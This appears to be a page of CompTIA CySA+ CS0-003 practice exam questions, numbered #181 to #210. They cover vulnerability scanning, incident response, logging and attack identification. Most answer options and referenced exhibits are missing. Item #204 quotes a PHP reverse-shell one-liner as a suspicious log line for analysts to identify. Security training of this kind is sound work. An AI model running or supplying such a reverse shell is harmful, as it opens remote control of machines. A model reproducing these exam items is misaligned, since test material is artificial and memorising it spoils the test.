Free Certification Practice Questions

COMPTIA-CYSA

CompTIA's CS0-003 Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Choose two.)
E. Implementing a coding standard
F. Implementing IDS
#181
CompTIA's CS0-003 A security analyst is trying to validate the results of a web application scan with Burp Suite. The security analyst performs the following:
Which of the following vulnerabilities is the security analyst trying to validate?
#182
CompTIA's CS0-003 A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls and two-factor authentication. Which of the following does this most likely describe?
#183
CompTIA's CS0-003 A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?
#184
CompTIA's CS0-003 An analyst investigated a website and produced the following:
Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?
#185
CompTIA's CS0-003 A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?
#186
CompTIA's CS0-003 A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?
#187
CompTIA's CS0-003 A security analyst has found the following suspicious DNS traffic while analyzing a packet capture:
• DNS traffic while a tunneling session is active.
• The mean time between queries is less than one second.
• The average query length exceeds 100 characters.
Which of the following attacks most likely occurred?
#188
CompTIA's CS0-003 A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?
#189
CompTIA's CS0-003 During the log analysis phase, the following suspicious command is detected:
Which of the following is being attempted?
#190
CompTIA's CS0-003 An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?
#191
CompTIA's CS0-003 A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection?
#192
CompTIA's CS0-003 Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?
#193
CompTIA's CS0-003 A security analyst has prepared a vulnerability scan that contains all of the company’s functional subnets. During the initial scan, users reported that network printers began to print pages that contained unreadable text and icons. Which of the following should the analyst do to ensure this behavior does not occur during subsequent vulnerability scans?
#194
CompTIA's CS0-003 A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project:
• Must use minimal network bandwidth
• Must use minimal host resources
• Must provide accurate, near real-time updates
• Must not have any stored credentials in configuration on the scanner
Which of the following vulnerability scanning methods should be used to best meet these requirements?
#195
CompTIA's CS0-003 An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?
#196
CompTIA's CS0-003 Which of the following does "federation" most likely refer to within the context of identity and access management?
#197
CompTIA's CS0-003 The Chief Information Security Officer for an organization recently received approval to install a new EDR solution. Following the installation, the number of alerts that require remediation by an analyst has tripled. Which of the following should the organization utilize to best centralize the workload for the internal security team? (Choose two.)
E. XDR
F. DLP
#198
CompTIA's CS0-003 Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?
#199
CompTIA's CS0-003 A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware based on its telemetry?
#200
CompTIA's CS0-003 A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?
#201
CompTIA's CS0-003 Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?
#202
CompTIA's CS0-003 Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
#203
CompTIA's CS0-003 While reviewing web server logs, a security analyst discovers the following suspicious line:
php -r ’$socket=fsockopen("10.0.0.1", 1234); passthru ("/bin/sh -i <&3 >&3 2>&3");’
Which of the following is being attempted?
#204
CompTIA's CS0-003 Which of the following should be updated after a lessons-learned review?
#205
CompTIA's CS0-003 A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?
#206
CompTIA's CS0-003 An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst's investigation?
#207
CompTIA's CS0-003 Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization's endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor's actions?
#208
CompTIA's CS0-003 An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?
#209
CompTIA's CS0-003 A security analyst reviews the following Arachni scan results for a web application that stores PII data:
Which of the following should be remediated first?
#210